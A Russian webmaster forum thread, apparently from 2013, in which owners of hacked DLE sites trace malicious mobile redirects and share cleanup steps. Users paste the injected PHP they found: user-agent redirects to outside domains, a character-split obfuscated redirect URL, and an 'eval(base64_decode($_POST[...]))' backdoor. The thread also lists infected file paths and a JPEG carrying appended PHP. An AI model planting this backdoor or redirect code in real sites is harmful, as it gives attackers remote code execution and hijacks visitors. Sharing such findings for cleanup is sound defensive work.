- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Что делать, если ваша email-рассылка попала в спам
10 распространенных причин и решений
Екатерина Ткаченко
gkir,
Пароли поменял все, насчет "чистого" движка тяжелый вопрос: примерно с DLE82 стандартно обновляюсь. Сейчас DLE95. (Заливаю файлы новых версий поверх старых). Сам уже подумал о том, чтобы все удалить (файлы движка), установить новый, и тогда уже базу восстановить. На хостинге 3 сайта, на всех появляется этот код. Все сайты DLE95, шаблоны свои. Сам постингом почти не занимаюсь, вполне возможно, что есть картинка паленая. Но как ее определить? Кстати, последние 5-6 месяцев заметил, что много регистраций с каких-то левых почтовиков. Уже за...лся вылавливать и запрещать регистрацию. В .htaccess доступ к сайтам разрешен только с IP в основном СНГ (забугор мне не нужен), хотя и там есть пробелы. Есть большое подозрение на базу, может там что-то?
Спасибо за участие.
P.S. Кстати, мой младший сын профессионально занимается ВЭБ-дизайном. Вчера общались, его сайты тоже ломали (хотя движки сам пишет). Я его успокоил, что у меня все ОК, и вот на тебе... Но пока все работает, посмотрим, что дальше будет.
вот, простой пример, как это делают, а значит надо искать в обратном порядке :-/
Мне вот тут профи помог - вроде пока все нормально. /ru/forum/752028
Как связаться, с человеком?
У меня еще в конце language/Russian/website.lng
Такая хрень
@setlocale(LC_ALL, array("ru_RU.CP1251", "ru_SU.CP1251", "ru_RU.KOI8-r", "ru_RU", "russian", "ru_SU", "ru"));
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://statuses.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
if (strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod")) header('Location: http://ya-analytics.ws/');
if(!empty($_POST['update'])) eval(base64_decode($_POST['update']));
Еще нашел
if(preg_match('/(android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|bada|windows phone)/i',$_SERVER['HTTP_USER_AGENT']) && $_COOKIE["m_"] != 1)
{
@setcookie('m_', '1', time()+86400, '/');
@header("Location: "."h"."t"."t"."p".":"."/"."/"."u"."p"."."."c"."c"."."."c"."o"."."."i"."d"."/"."u"."/"."4"."5"."9"."0");
die();
}
---------- Добавлено 28.02.2013 в 12:00 ----------
Вот что-то нашел по теме
http://dle-news.ru/bags/v96/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html
Просканировал антивирусом на компе все файлы сайта, скачаные 24 февраля (когда началась эта свистопляска с переадресацией).
Обнаружился вирус. Вот путь к нему:
.\engine\editor\jscripts\tiny_mce\plugins\spellchecker\spellchecker.php
В оригинале такого файла нет, да и в модулях, установленных на сайт, тоже.
Удалил, сайты работают нормально пока. Никаких побочных проблемм нет.
Сегодня опять пошла регистрация с каких-то непонятных адресов. Вот часть из них:
*@infosnet24.info
*@whydrinktea.info
*@biggestyellowpages.info
*@atautoinsurance.org
*@lighting-us.info
*@computerhardware2012.info
Временно запретил регистрацию на сайтах (тем более, что ссылки открытые на скачку, не в hide)
Айболитом провел полное сканирование. Обнаружил вредную картинку:
/engine/skins/bbcodes/images/t.jpeg
В оригинале ее нет, удалил. Жду, что получится.
Переименовал эту картинку в t.txt, открыл в блокноте, и в конце обнаружился php код. Я в этом php не силен. Кому интересно, могу выложить.
выложи, будет интересно посмотреть к чему готовиться, а то давно я не патчил дле :-/
gkir,
Вот ссылка на архив. Там сама картинка и код в текстовом файле, который вытянул из нее.
Пароль на архив:
cod
Прошло 5 суток после удаления файла t.jpeg, полет нормальный, больше ничего лишнего не появляется. Сайты работают, как положено.
Тоже сегодня обнаружил на нескольких сайтах данный код.
Все было забито кодом как и ранее писали:
./engine/data/dbconfig.php
./engine/engine.php
./engine/init.php
./index.php
./language/Russian/website.lng
и вот еще который нашел я:
./engine/data/config.php
На всех этих файлах выставил 444. Может кому поможет. Пока все нормально.
После Апа 18-го марта трафик на взломанном сайте упал в 5 раз. Хотя вроде все почищено полностью и превентивные меры приняты. Неужели Яша спустя 22 дня "отреагировал"на эти вирусные редиректы?